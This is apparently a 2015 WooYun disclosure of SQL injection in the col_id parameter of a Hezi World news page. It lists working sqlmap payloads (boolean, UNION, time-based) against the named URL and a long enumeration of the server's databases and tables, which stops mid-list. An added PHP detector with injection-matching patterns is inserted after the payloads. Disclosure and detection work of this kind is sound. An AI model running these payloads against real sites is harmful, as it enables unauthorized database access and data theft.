Vulnerability summary

Defect ID: wooyun-2015-0108790

Title: SQL injection in 盒子世界 (Hezi World) leaks a large amount of administrative information

Vendor: 盒子世界 (Hezi World)

Author: qqdaxingxing

Submitted: 2015-04-20 16:41

Fixed: 2015-06-04 16:42

Published: 2015-06-04 16:42

Type: SQL injection

Severity: High

Self-assessed rank: 10

Status: Vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-04-20: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-06-04: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

The information disclosure is simply enormous.

Detailed description:

http://www.ver.cn/news/news_detail.php?col_id=3234

Place: GET
Parameter: col_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: col_id=3234 AND 9307=9307
Type: UNION query
Title: MySQL UNION query (NULL) - 4 columns
Payload: col_id=-9668 UNION ALL SELECT NULL,NULL,CONCAT(0x716a726471,0x4146735069577a6e456b,0x71706b6271),NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: col_id=3234 AND SLEEP(5)
---
[19:27:25] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11
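The three probe shapes sqlmap reported above (a boolean tautology, a UNION column probe, and a SLEEP() delay) are easy to recognise in web-server access logs after the fact. The following PHP scanner is an added example and not part of the original report; the endpoint path and the col_id parameter come from the report, while the log lines are constructed, and the rule that col_id must be an integer is an assumption drawn from the fact that the legitimate request used a numeric value.

```php
<?php
// Added example (not from the report): scan access-log lines for the probe
// shapes sqlmap used against news_detail.php.  The log lines are constructed.

declare(strict_types=1);

// Signatures for the three techniques listed in the report.  Matching runs on
// the URL-decoded query string, because scanners percent-encode spaces.
const SQLI_SIGNATURES = [
    'boolean-tautology' => '/\bAND\s+(\d+)\s*=\s*\1\b/i',
    'union-select'      => '/\bUNION\s+(ALL\s+)?SELECT\b/i',
    'time-based-sleep'  => '/\bSLEEP\s*\(\s*\d+\s*\)/i',
];

// Returns a list of [line-number, reason] pairs for every suspicious request.
function scanAccessLog(array $lines): array
{
    $hits = [];
    foreach ($lines as $i => $line) {
        // Combined log format: "METHOD /path?query HTTP/1.x"
        if (!preg_match('/"(?:GET|POST)\s+([^\s"]+)/', $line, $m)) {
            continue;
        }
        $query = parse_url($m[1], PHP_URL_QUERY);
        if ($query === null || $query === false) {
            continue;
        }
        // Type expectation first: col_id is a numeric identifier, so any
        // non-integer value is suspicious before any signature is consulted.
        parse_str($query, $params);
        if (isset($params['col_id'])
            && filter_var($params['col_id'], FILTER_VALIDATE_INT) === false) {
            $hits[] = [$i + 1, 'non-integer col_id'];
        }
        $decoded = urldecode($query);
        foreach (SQLI_SIGNATURES as $name => $regex) {
            if (preg_match($regex, $decoded)) {
                $hits[] = [$i + 1, $name];
            }
        }
    }
    return $hits;
}

// Constructed sample: one legitimate request followed by the three probes
// from the report, percent-encoded the way a scanner would send them.
$sampleLog = [
    '203.0.113.5 - - [20/Apr/2015:19:27:01 +0800] "GET /news/news_detail.php?col_id=3234 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [20/Apr/2015:19:27:10 +0800] "GET /news/news_detail.php?col_id=3234%20AND%209307%3D9307 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [20/Apr/2015:19:27:18 +0800] "GET /news/news_detail.php?col_id=-9668%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x716a726471,0x4146735069577a6e456b,0x71706b6271),NULL%23 HTTP/1.1" 200 2048',
    '203.0.113.5 - - [20/Apr/2015:19:27:25 +0800] "GET /news/news_detail.php?col_id=3234%20AND%20SLEEP(5) HTTP/1.1" 200 5120',
];

foreach (scanAccessLog($sampleLog) as [$lineNo, $reason]) {
    echo "line {$lineNo}: {$reason}\n";
}
```

The first line produces no hit; each of the other three is flagged twice, once by the type check and once by the matching signature. The type check is the more robust of the two, since it catches any value that is not a plain integer regardless of which technique a scanner tries next, and it is the same check the application itself should apply before touching the database.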


Proof of vulnerability:

Database: 2shou
[18 tables]
+---------------------------------------+
| phpcars_ad |
| phpcars_admin |
| phpcars_assesscars |
| phpcars_brand |
| phpcars_buycars |
| phpcars_cars |
| phpcars_channel |
| phpcars_filmstrip |
| phpcars_friendlink |
| phpcars_member |
| phpcars_model |
| phpcars_news |
| phpcars_news_category |
| phpcars_page |
| phpcars_page_sorts |
| phpcars_permission |
| phpcars_sellcars |
| phpcars_settings |
+---------------------------------------+
Database: HeziHouse
[54 tables]
+---------------------------------------+
| box_house_gift_0 |
| box_house_gift_1 |
| box_house_gift_2 |
| box_house_gift_3 |
| box_house_gift_4 |
| box_house_gift_5 |
| box_house_gift_6 |
| box_house_gift_7 |
| box_house_gift_8 |
| box_house_gift_9 |
| box_house_item |
| box_house_item_log_0 |
| box_house_item_log_1 |
| box_house_item_log_2 |
| box_house_item_log_3 |
| box_house_item_log_4 |
| box_house_item_log_5 |
| box_house_item_log_6 |
| box_house_item_log_7 |
| box_house_item_log_8 |
| box_house_item_log_9 |
| box_house_room_0 |
| box_house_room_1 |
| box_house_room_2 |
| box_house_room_3 |
| box_house_room_4 |
| box_house_room_5 |
| box_house_room_6 |
| box_house_room_7 |
| box_house_room_8 |
| box_house_room_9 |
| box_house_room_item_0 |
| box_house_room_item_1 |
| box_house_room_item_2 |
| box_house_room_item_3 |
| box_house_room_item_4 |
| box_house_room_item_5 |
| box_house_room_item_6 |
| box_house_room_item_7 |
| box_house_room_item_8 |
| box_house_room_item_9 |
| box_house_store_0 |
| box_house_store_1 |
| box_house_store_2 |
| box_house_store_3 |
| box_house_store_4 |
| box_house_store_5 |
| box_house_store_6 |
| box_house_store_7 |
| box_house_store_8 |
| box_house_store_9 |
| house_room_config |
| item_build_config |
| item_function_config |
+---------------------------------------+
Database: shake
[29 tables]
+---------------------------------------+
| action |
| user |
| action_online |
| action_stat |
| action_text |
| counpon |
| default_text |
| follow |
| joint_action |
| joint_action_join_list |
| joint_action_list |
| joint_action_text |
| last_action |
| message |
| message_user_delete |
| push_notice |
| shop |
| shop_address |
| shop_charge_log |
| shop_charger |
| suggestion |
| sys_admin |
| sys_agent |
| sys_city |
| sys_industry |
| user_check_shop |
| user_ol |
| user_stat |
| wall |
+---------------------------------------+
Database: HeziMark
[16 tables]
+---------------------------------------+
| mark_plant_0 |
| mark_plant_1 |
| mark_plant_2 |
| mark_plant_3 |
| mark_plant_4 |
| mark_plant_5 |
| mark_plant_6 |
| mark_plant_7 |
| mark_plant_8 |
| mark_plant_9 |
| web_activity |
| web_guess |
| web_guess_answer |
| web_member |
| web_sys_role |
| web_sys_user |
+---------------------------------------+
Database: comein
[224 tables]
+---------------------------------------+
| phpcars_ad |
| phpcars_admin |
| phpcars_assesscars |
| phpcars_brand |
| phpcars_buycars |
| phpcars_cars |
| phpcars_channel |
| phpcars_filmstrip |
| phpcars_friendlink |
| phpcars_member |
| phpcars_model |
| phpcars_news |
| phpcars_news_category |
| phpcars_page |
| phpcars_page_sorts |
| phpcars_permission |
| phpcars_sellcars |
| phpcars_settings |
| qb_2shou_buyad |
| qb_2shou_class |
| qb_2shou_collection |
| qb_2shou_comments |
| qb_2shou_config |
| qb_2shou_content |
| qb_2shou_content_1 |
| qb_2shou_db |
| qb_2shou_dianping |
| qb_2shou_field |
| qb_2shou_module |
| qb_2shou_pic |
| qb_2shou_report |
| qb_2shou_sort |
| qb_ad_compete_place |
| qb_ad_compete_user |
| qb_ad_config |
| qb_ad_norm_place |
| qb_ad_norm_user |
| qb_ad_user |
| qb_admin_menu |
| qb_alonepage |
| qb_area |
| qb_city |
| qb_config |
| qb_coupon_config |
| qb_coupon_content |
| qb_coupon_content_1 |
| qb_coupon_field |
| qb_coupon_module |
| qb_coupon_sort |
| qb_crontab |
| qb_dianping_buyad |
| qb_dianping_claim |
| qb_dianping_class |
| qb_dianping_collection |
| qb_dianping_comments |
| qb_dianping_config |
| qb_dianping_content |
| qb_dianping_content_1 |
| qb_dianping_content_2 |
| qb_dianping_content_3 |
| qb_dianping_db |
| qb_dianping_dianping |
| qb_dianping_field |
| qb_dianping_module |
| qb_dianping_pic |
| qb_dianping_report |
| qb_dianping_sort |
| qb_fenlei_buyad |
| qb_fenlei_class |
| qb_fenlei_collection |
| qb_fenlei_comments |
| qb_fenlei_config |
| qb_fenlei_content |
| qb_fenlei_content_1 |
| qb_fenlei_content_13 |
| qb_fenlei_content_14 |
| qb_fenlei_content_2 |
| qb_fenlei_content_3 |
| qb_fenlei_content_4 |
| qb_fenlei_content_5 |
| qb_fenlei_content_6 |
| qb_fenlei_content_7 |
| qb_fenlei_db |
| qb_fenlei_dianping |
| qb_fenlei_field |
| qb_fenlei_module |
| qb_fenlei_pic |
| qb_fenlei_report |
| qb_fenlei_sort |
| qb_form_config |
| qb_form_content |
| qb_form_content_1 |
| qb_form_content_3 |
| qb_form_module |
| qb_form_reply |
| qb_friendlink |
| qb_friendlink_sort |
| qb_gift_config |
| qb_gift_content |
| qb_gift_content_1 |
| qb_gift_content_2 |
| qb_gift_field |
| qb_gift_join |
| qb_gift_module |
| qb_gift_sort |
| qb_group |
| qb_guestbook_config |
| qb_guestbook_content |
| qb_guestbook_sort |
| qb_hack |
| qb_house_buyad |
| qb_house_class |
| qb_house_collection |
| qb_house_comments |
| qb_house_config |
| qb_house_content |
| qb_house_content_1 |
| qb_house_content_2 |
| qb_house_content_3 |
| qb_house_content_4 |
| qb_house_content_5 |
| qb_house_content_6 |
| qb_house_db |
| qb_house_dianping |
| qb_house_field |
| qb_house_module |
| qb_house_pic |
| qb_house_report |
| qb_house_sort |
| qb_hr_apply |
| qb_hr_city |
| qb_hr_collection |
| qb_hr_config |
| qb_hr_content |
| qb_hr_content_1 |
| qb_hr_content_2 |
| qb_hr_field |
| qb_hr_module |
| qb_hr_person |
| qb_hr_sort |
| qb_hy_company |
| qb_hy_company_fid |
| qb_hy_config |
| qb_hy_dianping |
| qb_hy_friendlink |
| qb_hy_guestbook |
| qb_hy_home |
| qb_hy_mysort |
| qb_hy_news |
| qb_hy_pic |
| qb_hy_picsort |
| qb_hy_sort |
| qb_jfabout |
| qb_jfsort |
| qb_label |
| qb_limitword |
| qb_memberdata |
| qb_members |
| qb_menu |
| qb_module |
| qb_moneycard |
| qb_moneylog |
| qb_news_comments |
| qb_news_config |
| qb_news_content |
| qb_news_content_1 |
| qb_news_keyword |
| qb_news_keywordid |
| qb_news_sort |
| qb_olpay |
| qb_pm |
| qb_propagandize |
| qb_purse |
| qb_regnum |
| qb_rmb_consume |
| qb_rmb_getout |
| qb_rmb_infull |
| qb_sell_telephone |
| qb_shop_address |
| qb_shop_collection |
| qb_shop_comments |
| qb_shop_config |
| qb_shop_content |
| qb_shop_content_1 |
| qb_shop_content_2 |
| qb_shop_field |
| qb_shop_join |
| qb_shop_module |
| qb_shop_pic |
| qb_shop_report |
| qb_shop_sort |
| qb_shoptg_collection |
| qb_shoptg_comments |
| qb_shoptg_config |
| qb_shoptg_content |
| qb_shoptg_content_1 |
| qb_shoptg_content_2 |
| qb_shoptg_field |
| qb_shoptg_join |
| qb_shoptg_module |
| qb_shoptg_pic |
| qb_shoptg_purse |
| qb_shoptg_report |
| qb_shoptg_sort |
| qb_street |
| qb_template |
| qb_template_bak |
| qb_tuangou_comments |
| qb_tuangou_config |
| qb_tuangou_content |
| qb_tuangou_content_1 |
| qb_tuangou_content_2 |
| qb_tuangou_field |
| qb_tuangou_join |
| qb_tuangou_module |
| qb_tuangou_report |
| qb_tuangou_sort |
| qb_upfile |
| qb_vote_comment |
| qb_vote_config |
| qb_vote_element |
| qb_vote_topic |
| qb_yzimg |
| qb_zone |
+---------------------------------------+
Database: HeziBlog
[87 tables]
+---------------------------------------+
| blog_action_log |
| blog_allow_timing_box |
| blog_article |
| blog_article_box |
| blog_article_id |
| blog_article_part0 |
| blog_article_part1 |
| blog_article_part2 |
| blog_article_part3 |
| blog_article_part4 |
| blog_article_part5 |
| blog_article_part6 |
| blog_article_part7 |
| blog_banner |
| blog_ccNotify |
| blog_day_log |
| blog_fans |
| blog_fans_detail |
| blog_favorites |
| blog_fresh |
| blog_game |
| blog_game_blogid |
| blog_game_c |
| blog_game_log |
| blog_game_recommend |
| blog_group |
| blog_group_applyjoin |
| blog_group_article_id |
| blog_group_article_part0 |
| blog_group_article_part1 |
| blog_group_article_part2 |
| blog_group_article_part3 |
| blog_group_article_part4 |
| blog_group_article_part5 |
| blog_group_article_part6 |
| blog_group_article_part7 |
| blog_group_game_blogid |
| blog_group_grouper |
| blog_group_hall_relation |
| blog_group_recylce |
| blog_group_team |
| blog_group_team_article |
| blog_group_team_fans |
| blog_group_video_blogid |
| blog_history |
| blog_history_part0 |
| blog_history_part1 |
| blog_history_part2 |
| blog_history_part3 |
| blog_history_part4 |
| blog_history_part5 |
| blog_history_part6 |
| blog_history_part7 |
| blog_image |
| blog_login_log |
| blog_medal |
| blog_notice |
| blog_qq |
| blog_recylce |
| blog_reply |
| blog_reply_belong |
| blog_report |
| blog_retweet |
| blog_search |
| blog_star |
| blog_subject |
| blog_team |
| blog_team_article |
| blog_team_fans |
| blog_team_scene |
| blog_timing_job |
| blog_top_team |
| blog_users |
| blog_users_medal |
| blog_users_part0 |
| blog_users_part1 |
| blog_users_part2 |
| blog_users_part3 |
| blog_users_part4 |
| blog_users_part5 |
| blog_users_part6 |
| blog_users_part7 |
| blog_video |
| blog_video_blogid |
| blog_video_kind |
| blog_video_recommend |
| blog_vote |
+---------------------------------------+
Database: mysql
[25 tables]
+---------------------------------------+
| user |
| box_doodle |
| box_doodleresource |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| servers |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+---------------------------------------+
Database: footbal
[3 tables]
+---------------------------------------+
| Sheet1$ |
| Sheet2$ |
| Sheet3$ |
+---------------------------------------+
Database: newver
[39 tables]
+---------------------------------------+
| user |
| aboutus |
| ad |
| adclass |
| alclass |
| authority |
| authority_en |
| authorityclass |
| award |
| click |
| client |
| column_cat |
| columns |
| columns_en |
| columns_en1 |
| columns_en_pic |
| columns_pic |
| contact |
| cyclass |
| dpclass |
| job |
| job_en |
| jobclass |
| links |
| links_en |
| model |
| notdownload |
| note |
| noteuser |
| product |
| product_en |
| productclass |
| site |
| usermodel |
| webinfo |
| works |
| works_en |
| works_en_pic |
| works_pic |
+---------------------------------------+
Database: HeziTT
[20 tables]
+---------------------------------------+
| action |
| user |
| action_online |
| action_stat |
| counpon |
| follow |
| last_action |
| message |
| shop |
| shop_address |
| shop_charge_log |
| shop_charger |
| suggestion |
| sys_admin |
| sys_agent |
| sys_city |
| sys_industry |
| user_ol |
| user_stat |
| wall |
+---------------------------------------+
Database: HeziLand
[7 tables]
+---------------------------------------+
| land_card_info |
| land_card_relation |
| land_info |
| land_relation |
| land_role_box_relation |
| land_role_info |
| land_role_relation |
+---------------------------------------+
Database: HeziStealdream
[4 tables]
+---------------------------------------+
| stealdream_get_gift |
| stealdream_gift |
| stealdream_language |
| stealdream_place |
+---------------------------------------+
Database: HeziFightEx
[13 tables]
+---------------------------------------+
| box_city |
| box_city_fight_log |
| box_city_fight_time |
| city_hall_fight_result |
| city_reward_list |
| fight_capital_camp |
| fight_capital_camp_box |
| hall_abandon_city_log |
| hall_box_city_fight_relation |
| hall_city_fight_statistics |
| hall_city_relation |
| hall_fight_city_log |
| invest_camp_box |
+---------------------------------------+
Database: HeziItem
[9 tables]
+---------------------------------------+
| box_item_basic_info |
| box_item_ext_arm |
| box_item_ext_face |
| box_item_ext_sprite |
| box_item_type |
| plant_bg |
| plant_fruit |
| plant_plant |
| plant_seed |
+---------------------------------------+
Database: love320
[82 tables]
+---------------------------------------+
| dede_cardaddonarticle |
| dede_cardaddonimages |
| dede_cardaddoninfos |
| dede_cardaddonshop |
| dede_cardaddonsoft |
| dede_cardaddonspec |
| dede_cardadmin |
| dede_cardadmintype |
| dede_cardadvancedsearch |
| dede_cardarcatt |
| dede_cardarccache |
| dede_cardarchives |
| dede_cardarcmulti |
| dede_cardarcrank |
| dede_cardarctiny |
| dede_cardarctype |
| dede_cardarea |
| dede_cardchanneltype |
| dede_cardco_htmls |
| dede_cardco_mediaurls |
| dede_cardco_note |
| dede_cardco_onepage |
| dede_cardco_urls |
| dede_carddiyforms |
| dede_carddownloads |
| dede_carderradd |
| dede_cardfeedback |
| dede_cardflink |
| dede_cardflinktype |
| dede_cardfreelist |
| dede_cardhomepageset |
| dede_cardkeywords |
| dede_cardlog |
| dede_cardmember |
| dede_cardmember_company |
| dede_cardmember_feed |
| dede_cardmember_flink |
| dede_cardmember_friends |
| dede_cardmember_group |
| dede_cardmember_guestbook |
| dede_cardmember_model |
| dede_cardmember_msg |
| dede_cardmember_operation |
| dede_cardmember_person |
| dede_cardmember_pms |
| dede_cardmember_snsmsg |
| dede_cardmember_space |
| dede_cardmember_stow |
| dede_cardmember_stowtype |
| dede_cardmember_tj |
| dede_cardmember_type |
| dede_cardmember_vhistory |
| dede_cardmoneycard_record |
| dede_cardmoneycard_type |
| dede_cardmtypes |
| dede_cardmultiserv_config |
| dede_cardmyad |
| dede_cardmytag |
| dede_cardpayment |
| dede_cardplus |
| dede_cardpwd_tmp |
| dede_cardratings |
| dede_cardscores |
| dede_cardsearch_cache |
| dede_cardsearch_keywords |
| dede_cardsgpage |
| dede_cardshops_delivery |
| dede_cardshops_orders |
| dede_cardshops_products |
| dede_cardshops_userinfo |
| dede_cardsoftconfig |
| dede_cardstepselect |
| dede_cardsys_enum |
| dede_cardsys_module |
| dede_cardsys_set |
| dede_cardsys_task |
| dede_cardsysconfig |
| dede_cardtagindex |
| dede_cardtaglist |
| dede_carduploads |
| dede_cardverifies |
| dede_cardvote |
+---------------------------------------+
Database: photo
[12 tables]
+---------------------------------------+
| interp_categories |
| interp_comments |
| interp_contents |
| interp_gimages |
| interp_images |
| interp_mainsettings |
| interp_news |
| interp_sessions |
| interp_tags |
| interp_usergroups |
| interp_users |
| interp_vvc |
+---------------------------------------+
Database: HeziKunta
[14 tables]
+---------------------------------------+
| kunta_config |
| kunta_fight_log |
| kunta_hall |
| kunta_hall_apply |
| kunta_hall_arms |
| kunta_hall_election |
| kunta_hall_fight |
| kunta_hall_member |
| kunta_hall_member_election |
| kunta_hall_member_fight |
| kunta_hall_member_point |
| kunta_hall_treasury |
| kunta_message |
| kunta_treasury |
+---------------------------------------+
Database: HeziCar
[81 tables]
+---------------------------------------+
| box_car_0 |
| box_car_1 |
| box_car_2 |
| box_car_3 |
| box_car_4 |
| box_car_5 |
| box_car_6 |
| box_car_7 |
| box_car_8 |
| box_car_9 |
| box_car_build_0 |
| box_car_build_1 |
| box_car_build_2 |
| box_car_build_3 |
| box_car_build_4 |
| box_car_build_5 |
| box_car_build_6 |
| box_car_build_7 |
| box_car_build_8 |
| box_car_build_9 |
| box_car_garage_0 |
| box_car_garage_1 |
| box_car_garage_2 |
| box_car_garage_3 |
| box_car_garage_4 |
| box_car_garage_5 |
| box_car_garage_6 |
| box_car_garage_7 |
| box_car_garage_8 |
| box_car_garage_9 |
| box_car_match_challenge_0 |
| box_car_match_challenge_1 |
| box_car_match_challenge_2 |
| box_car_match_challenge_3 |
| box_car_match_challenge_4 |
| box_car_match_challenge_5 |
| box_car_match_challenge_6 |
| box_car_match_challenge_7 |
| box_car_match_challenge_8 |
| box_car_match_challenge_9 |
| box_car_match_rally_0 |
| box_car_match_rally_1 |
| box_car_match_rally_2 |
| box_car_match_rally_3 |
| box_car_match_rally_4 |
| box_car_match_rally_5 |
| box_car_match_rally_6 |
| box_car_match_rally_7 |
| box_car_match_rally_8 |
| box_car_match_rally_9 |
| box_car_park_0 |
| box_car_park_1 |
| box_car_park_2 |
| box_car_park_3 |
| box_car_park_4 |
| box_car_park_5 |
| box_car_park_6 |
| box_car_park_7 |
| box_car_park_8 |
| box_car_park_9 |
| box_car_props_0 |
| box_car_props_1 |
| box_car_props_2 |
| box_car_props_3 |
| box_car_props_4 |
| box_car_props_5 |
| box_car_props_6 |
| box_car_props_7 |
| box_car_props_8 |
| box_car_props_9 |
| box_car_train_list |
| build_config |
| car_config |
| car_level_config |
| garage_level_config |
| match_challenge_config |
| match_opponent_config |
| match_rally_config |
| match_result_config |
| park_config |
| props_config |
+---------------------------------------+
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| KEY_COLUMN_USAGE |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
Database: shoptest
[14 tables]
+---------------------------------------+
| web_about |
| web_city |
| web_color |
| web_color_type |
| web_department |
| web_express |
| web_info |
| web_member |
| web_member_collect |
| web_member_order |
| web_member_order_detail |
| web_member_receiver |
| web_member_score |
| web_product |
+---------------------------------------+
Database: kis
[21 tables]
+---------------------------------------+
| tb_dept |
| tb_flow |
| tb_flow_action |
| tb_flow_status |
| tb_issue |
| tb_issue_action_user |
| tb_issue_attach |
| tb_issue_comment |
| tb_issue_field |
| tb_issue_log |
| tb_project |
| tb_project_field_edit |
| tb_project_fields |
| tb_project_group |
| tb_project_group_member |
| tb_project_issue_type |
| tb_project_module |
| tb_project_worker |
| tb_query_view |
| tb_role |
| tb_user |
+---------------------------------------+
Database: HeziHi
[14 tables]
+---------------------------------------+
| hi_activity_school_egg |
| hi_activity_school_statistics |
| hi_activity_school_top_list |
| hi_box_modify_pwd_log |
| hi_city_info |
| hi_confirm_mail |
| hi_middle_school |
| hi_primary_school |
| hi_province_info |
| hi_recent_visitor |
| hi_rumour |
| hi_rumour_box |
| hi_security_action_log |
| hi_valid_school |
+---------------------------------------+
Database: HeziShop
[6 tables]
+---------------------------------------+
| shop_goods |
| shop_goods_item_relation |
| shop_goods_sale_info |
| shop_goods_type |
| shop_goods_type_relation |
| shop_info |
+---------------------------------------+
Database: HeziAccount
[41 tables]
+---------------------------------------+
| Sheet1$ |
| account_account |
| account_box_score_0 |
| account_box_score_1 |
| account_box_score_2 |
| account_box_score_3 |
| account_box_score_4 |
| account_box_score_5 |
| account_box_score_6 |
| account_box_score_7 |
| account_box_score_8 |
| account_box_score_9 |
| account_card |
| account_card_need |
| account_card_show |
| account_card_type |
| account_consume_log |
| account_dealer |
| account_dream_packet_log |
| account_gains |
| account_gains_city |
| account_go_day_log |
| account_help |
| account_lyactivity_log |
| account_payment |
| account_payment_error_log |
| account_rate |
| account_resupply_order |
| account_school |
| account_score |
| account_sendGift |
| account_serve_log |
| account_sysconfig |
| account_user_account0 |
| account_users |
| account_users_temp |
| account_zhichong_return_log |
| account_zhongy_return_log |
| temp_gift |
| temp_goods |
| temp_notice |
+---------------------------------------+
Database: guess
[6 tables]
+---------------------------------------+
| web_activity |
| web_guess |
| web_guess_answer |
| web_member |
| web_sys_role |
| web_sys_user |
+---------------------------------------+
Database: gpstracker
[5 tables]
+---------------------------------------+
| Sheet1$ |
| Sheet2$ |
| Sheet3$ |
| gpslocations |
| gpslocations_copy |
+---------------------------------------+
Database: saker
[15 tables]
+---------------------------------------+
| user |
| saker_commentmeta |
| saker_comments |
| saker_download_detail |
| saker_links |
| saker_options |
| saker_postmeta |
| saker_posts |
| saker_term_relationships |
| saker_term_taxonomy |
| saker_terms |
| saker_usermeta |
| saker_users |
| saker_vote |
| saker_vote_detail |
+---------------------------------------+
Database: phpwind
[152 tables]
+---------------------------------------+
| pw_actions |
| pw_activity |
| pw_actmember |
| pw_administrators |
| pw_adminlog |
| pw_adminset |
| pw_advert |
| pw_announce |
| pw_argument |
| pw_attachbuy |
| pw_attachs |
| pw_banuser |
| pw_bbsinfo |
| pw_block |
| pw_buyadvert |
| pw_cache |
| pw_cachedata |
| pw_clientorder |
| pw_cmembers |
| pw_cnalbum |
| pw_cnclass |
| pw_cnphoto |
| pw_colonys |
| pw_comment |
| pw_config |
| pw_creditlog |
| pw_credits |
| pw_customfield |
| pw_datanalyse |
| pw_datastate |
| pw_datastore |
| pw_debatedata |
| pw_debates |
| pw_diary |
| pw_diarytype |
| pw_draft |
| pw_elements |
| pw_extragroups |
| pw_favors |
| pw_feed |
| pw_filter |
| pw_filter_class |
| pw_filter_dictionary |
| pw_filter_record |
| pw_focus |
| pw_forumdata |
| pw_forumlog |
| pw_forummsg |
| pw_forums |
| pw_forumsell |
| pw_forumsextra |
| pw_forumtype |
| pw_friends |
| pw_friendtype |
| pw_hack |
| pw_help |
| pw_invitecode |
| pw_invoke |
| pw_invokepiece |
| pw_ipstates |
| pw_job |
| pw_jober |
| pw_medalinfo |
| pw_medalslogs |
| pw_medaluser |
| pw_membercredit |
| pw_memberdata |
| pw_memberinfo |
| pw_members |
| pw_memo |
| pw_modehot |
| pw_modules |
| pw_mpageconfig |
| pw_msg |
| pw_msgc |
| pw_msglog |
| pw_nav |
| pw_oboard |
| pw_online |
| pw_ouserdata |
| pw_overprint |
| pw_owritedata |
| pw_pcfield |
| pw_pcmember |
| pw_pcvalue1 |
| pw_pcvalue2 |
| pw_permission |
| pw_pidtmp |
| pw_pinglog |
| pw_plan |
| pw_polls |
| pw_postcate |
| pw_posts |
| pw_postsfloor |
| pw_poststopped |
| pw_proclock |
| pw_pushdata |
| pw_pushpic |
| pw_rate |
| pw_rateconfig |
| pw_rateresult |
| pw_recycle |
| pw_report |
| pw_reward |
| pw_schcache |
| pw_setform |
| pw_share |
| pw_sharelinks |
| pw_singleright |
| pw_smiles |
| pw_sqlcv |
| pw_stamp |
| pw_stopic |
| pw_stopicblock |
| pw_stopiccategory |
| pw_stopicpictures |
| pw_stopicunit |
| pw_styles |
| pw_tagdata |
| pw_tags |
| pw_task |
| pw_threads |
| pw_tmsgs |
| pw_toollog |
| pw_tools |
| pw_topiccate |
| pw_topicfield |
| pw_topicmodel |
| pw_topictype |
| pw_topicvalue1 |
| pw_topicvalue2 |
| pw_topicvalue3 |
| pw_topicvalue4 |
| pw_topicvalue5 |
| pw_topicvalue6 |
| pw_topicvalue7 |
| pw_topicvalue8 |
| pw_tpl |
| pw_tpltype |
| pw_trade |
| pw_tradeorder |
| pw_ucapp |
| pw_ucnotify |
| pw_ucsyncredit |
| pw_userapp |
| pw_userbinding |
| pw_usercache |
| pw_usergroups |
| pw_usertool |
| pw_voter |
| pw_windcode |
| pw_wordfb |
+---------------------------------------+
Database: podcast
[24 tables]
+---------------------------------------+
| pod_commentmeta |
| pod_comments |
| pod_links |
| pod_options |
| pod_postmeta |
| pod_posts |
| pod_term_relationships |
| pod_term_taxonomy |
| pod_terms |
| pod_usermeta |
| pod_users |
| podcast_commentmeta |
| podcast_comments |
| podcast_links |
| podcast_options |
| podcast_podpress_statcounts |
| podcast_podpress_stats |
| podcast_postmeta |
| podcast_posts |
| podcast_term_relationships |
| podcast_term_taxonomy |
| podcast_terms |
| podcast_usermeta |
| podcast_users |
+---------------------------------------+
Database: huhu
[25 tables]
+---------------------------------------+
| huhu_commentmeta |
| huhu_comments |
| huhu_links |
| huhu_options |
| huhu_podpress_statcounts |
| huhu_podpress_stats |
| huhu_postmeta |
| huhu_posts |
| huhu_term_relationships |
| huhu_term_taxonomy |
| huhu_terms |
| huhu_usermeta |
| huhu_users |
| wp_weixin |
| wx_alipay_list |
| wx_alipay_server |
| wx_buyhuhu |
| wx_content |
| wx_question |
| wx_replay |
| wx_userinfo |
| wx_userquestion |
| wx_vote_list |
| wx_vote_record |
| wx_vote_usercontent |
+---------------------------------------+
Database: HeziBread
[18 tables]
+---------------------------------------+
| box_adorn |
| box_adorn_buylog |
| box_bread_adorn |
| box_bread_pack |
| box_bread_pack_reply |
| box_bread_packdata |
| box_bread_recommend |
| box_bread_recylce |
| box_bread_reply |
| box_bread_temp |
| box_bread_users |
| box_bread_video |
| box_bread_word |
| box_breads |
| box_breads_icebox |
| box_browse_history |
| box_report |
| box_search_word |
+---------------------------------------+
Database: HeziBackup
[93 tables]
+---------------------------------------+
| box_action_log_slave1_201107 |
| box_action_log_slave1_201109 |
| box_action_log_slave2_201107 |
| box_action_log_slave3_201107 |
| box_action_log_slave4_201107 |
| box_passport_list_slave1_201107 |
| box_passport_list_slave1_201109 |
| box_passport_list_slave2_201107 |
| box_passport_list_slave2_201109 |
| box_passport_list_slave3_201107 |
| box_passport_list_slave3_201109 |
| box_passport_list_slave4_201107 |
| box_passport_list_slave4_201109 |
| msg_box_action_0_msg_201109 |
| msg_box_action_10_msg_201109 |
| msg_box_action_11_msg_201109 |
| msg_box_action_12_msg_201109 |
| msg_box_action_13_msg_201109 |
| msg_box_action_14_msg_201109 |
| msg_box_action_15_msg_201109 |
| msg_box_action_16_msg_201109 |
| msg_box_action_17_msg_201109 |
| msg_box_action_18_msg_201109 |
| msg_box_action_19_msg_201109 |
| msg_box_action_1_msg_201109 |
| msg_box_action_2_msg_201109 |
| msg_box_action_3_msg_201109 |
| msg_box_action_4_msg_201109 |
| msg_box_action_5_msg_201109 |
| msg_box_action_6_msg_201109 |
